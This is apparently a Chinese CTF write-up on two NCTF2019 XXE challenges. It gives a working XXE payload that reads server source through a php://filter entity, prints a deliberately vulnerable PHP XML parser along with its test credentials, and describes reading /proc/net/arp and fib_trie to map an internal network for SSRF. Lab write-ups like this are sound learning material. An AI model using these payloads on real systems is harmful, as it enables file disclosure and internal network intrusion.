【XXE实战】——浅看两道CTF题

  • 上一条帖子【XXE漏洞】原理及实践演示对XXE的一些原理进行了浅析,于是写了两道CTF题巩固一下,顺便也记录一下第一次写出来CTF。两道题都是在BUU上找的:[NCTF2019]Fake XML cookbook和[NCTF2019]True XML cookbook

一、[NCTF2019]Fake XML cookbook

  • 打开是个登录界面:

  • F12看一下源码,可以发现存在一段js代码:

     

function doLogin(){
    
	var username = $("#username").val();
    
	var password = $("#password").val();
    
	if(username == "" || password == ""){
    
		alert("Please enter the username and password!");
    
		return;
    
	}

	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
    
    $.ajax({
    
        type: "POST",
    
        url: "doLogin.php",
    
        contentType: "application/xml;charset=utf-8",
    
        data: data,
    
        dataType: "xml",
    
        anysc: false,
    
        success: function (result) {
    
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
    
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
    
        	if(code == "0"){
    
        		$(".msg").text(msg + " login fail!");
    
        	}else if(code == "1"){
    
        		$(".msg").text(msg + " login success!");
    
        	}else{
    
        		$(".msg").text("error:" + msg);
    
        	}
    
        },
    
        error: function (XMLHttpRequest,textStatus,errorThrown) {
    
            $(".msg").text(errorThrown + ':' + textStatus);
    
        }
    
    });
    
}

    可以看到存在一个doLogin.php文件。那么可以使用PHP://伪协议进行读取看看。

  • 抓包修改参数,输入我们的payload:

    <?xml version="1.0" encoding="UTF-8"?>
    
<!DOCTYPE foo[
    
<!ENTITY rabbit SYSTEM "PHP://filter/read=convert.base64-encode/resource=doLogin.php">
    
]>
    
<user><username>&rabbit;</username><password>1213</password></user>

    把得到的编码进行解码可以得到下面的php代码:

    <?php
    
/**
    
* autor: c0ny1
    
* date: 2018-2-7
    
*/

$USERNAME = 'admin'; //账号
    
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
    
$result = null;

libxml_disable_entity_loader(false);
    
$xmlfile = file_get_contents('php://input');

try{
    
	$dom = new DOMDocument();
    
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
    
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
    
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
    
	}else{
    
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
    
	}
    
}catch(Exception $e){
    
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
    
}

header('Content-Type: text/html; charset=utf-8');
    
echo $result;
    
?>

    代码只是进行了一个简单验证,那么输入账号admin和密码024b87931a03f738fff6693ce0a78c88看看:

    没啥用...

  • 直接试试有没有flag目录(看有的题解说是题目有提示,所以不知道是不是buu的问题,我是没看到):

    over

二、[NCTF2019]True XML cookbook

  • 打开界面可以看到和上面题一模一样,然后同样读doLogin.php也没啥用,直接访问flag目录也没有线索。

  • 看题解后发现,可以使用XXE+SSRF的方法,即使用伪协议进行内网的嗅探。那么第一步就是看内网的结构:

    payload查看靶机路由表:

    file:///proc/net/arp

    可以看到有两个路由169.254.1.1和10.128.253.12。

  • 使用bp的intrude模块对这两个路径C段进行爆破

    爆破过程巨慢无比....不知道为啥,以后有空研究一下。但是看网上的wp说这两个C段扫描不出来东西。

  • 查看proc/net/fib_trie下的路由树

    file:///proc/net/fib_trie

  • 下面对10.244.80.215的C段进行爆破,同样非常慢,不想等了最后没解出来。

三、收获

  • 熟悉了使用file伪协议查看文件,php伪协议读取文件
  • 学习了xxe+ssrf的利用方式,对于linux主机可以读取proc/net/arp路径查看其路由表从而得到其内网结构。在主机没有flag的情况下,可能藏在其他内网主机中。
  • bp的intrude模块不知道怎么调才能实现超时放弃请求....

【XXE实战】——浅看两道CTF题的更多相关文章

  1. 『ACM C++』Virtual Judge | 两道基础题 - The Architect Omar && Malek and Summer Semester

    这几天一直在宿舍跑PY模型,学校的ACM寒假集训我也没去成,来学校的时候已经18号了,突然加进去也就上一天然后排位赛了,没学什么就去打怕是要被虐成渣,今天开学前一天,看到最后有一场大的排位赛,就上去试 ...

  2. 两道CTF Web的题目

    1.easyphp 1.1.题目描述 题目首先是一张不存在的图片 查看源码发现只有一句话 <img src="show.php?img=aGludC5qcGc=" width ...

  3. union注入的几道ctf题,实验吧简单的sql注入1,2,这个看起来有点简单和bugku的成绩单

    这几天在做CTF当中遇到了几次sql注入都是union,写篇博客记录学习一下. 首先推荐一篇文章“https://blog.csdn.net/Litbai_zhang/article/details/ ...

  4. Java基础知识强化11:多态的两道基础题

    1.第1题 class Base { public void method() { System.out.print("Base method"); } } class Child ...

  5. 逛园子,看到个练习题,小试了一把(淘宝ued的两道小题)

    闲来无事,逛园子,充充电.发现了一个挺有意思的博文,自己玩了一把. 第一题:使用 HTML+CSS 实现如图布局,border-widht 1px,一个格子大小是 60*60,hover时候边框变为橘 ...

  6. Co-prime Array&&Seating On Bus(两道水题)

     Co-prime Array Time Limit:1000MS     Memory Limit:262144KB     64bit IO Format:%I64d & %I64u Su ...

  7. MT【327】两道不等式题

    当$x,y\ge0,x+y=2$时求下面式子的最小值:1)$x+\sqrt{x^2-2x+y^2+1}$2)$\dfrac{1}{5}x+\sqrt{x^2-2x+y^2+1}$ 解:1)$P(x,y ...

  8. MT【235】两道函数题

    已知$g(x)=x^2-ax+4a$,记$h(x)=|\dfrac{x}{g(x)}|$,若$h(x)$在$(0,1]$上单调递增,求$a$的取值范围. 解答: 已知$$g(x)=\begin{cas ...

  9. [转载]2014年10月26完美世界校招两道java题

    public class VolitileTest { volatile static int count=0; public static void main(String args[]){ for ...

  10. DASCTF七月赛两道Web题复现

    Ezfileinclude(目录穿越) 拿到http://183.129.189.60:10012/image.php?t=1596121010&f=Z3F5LmpwZw== t是时间,可以利 ...

随机推荐

  1. Spring容器获取Bean的9种方式

    1 前言 随着SpringBoot的普及,Spring的使用也越来越广,在某些场景下,我们无法通过注解或配置的形式直接获取到某个Bean.比如,在某一些工具类.设计模式实现中需要使用到Spring容器 ...

  2. selenium元素定位---ElementNotInteractableException(元素不可交互异常)解决方法

    方法一: 增加强制等待时间 方法二: 使用js点击 element = self.browser.find_element(By.XPATH, "//td[@class='el-table_ ...

  3. Blazor前后端框架Known-V1.2.5

    V1.2.5 Known是基于C#和Blazor开发的前后端分离快速开发框架,开箱即用,跨平台,一处代码,多处运行. Gitee: https://gitee.com/known/Known Gith ...

  4. OSS的使用(谷粒商城58-64)

    OSS的使用(谷粒商城58-64) 购买之类的就不在这里详述了,阿里云文档几乎都写了 创建bucket 学习阶段,相对独特的点在于我们需要选择公共读 项目开发阶段,不能选择公共读了,要尽量选择私有(代 ...

  5. 常见的 NoSQL 数据库有哪些?

    前言 今天我们来介绍一下工作开发中常见的一些NoSQL数据库及其基本特点.欢迎在评论区留下文章中没有介绍且好用的​NOSQL数据库. 什么是NOSQL数据库 非关系型数据库又被称为 NoSQL(Not ...

  6. 最全linux基础知识

    linux基础知识 [root@localhost ~]# 各位置表示什么意识 root:表示用户名 (现在的用户是root切换为test便是张三) localhost:表示主机名 (当前主机名切换为 ...

  7. nginx配置gzip压缩

    前言 为提高用户获取响应数据的速度,Nginx服务器可以将响应数据进行gzip压缩,在减小响应数据的大小后再发送给用户端浏览器. 要想启用gzip压缩,需要浏览器支持gzip压缩功能,目前大多数浏览器 ...

  8. 并发工具类Phaser

    前言 在面试这一篇我们介绍过CountDownLatch和CyclicBarrier,它们都是jdk1.5提供的多线程并发控制类,内部都是用AQS这个同步框架实现. 在我们的实际项目中,有很多场景是需 ...

  9. Log4j疯狂写日志问题排查

    一.问题是怎么发现的 最近有个 Java 系统上线后不久就收到了磁盘使用率告警,磁盘使用率已经超过了 90% 以上,并且磁盘使用率还在不停增长. 二.问题带来的影响 由于服务器磁盘被打满,导致了系统正 ...

  10. SpringBoot3集成Redis

    目录 一.简介 二.工程搭建 1.工程结构 2.依赖管理 3.Redis配置 三.Redis用法 1.环境搭建 2.数据类型 3.加锁机制 四.Mybatis缓存 1.基础配置 2.自定义实现 五.参 ...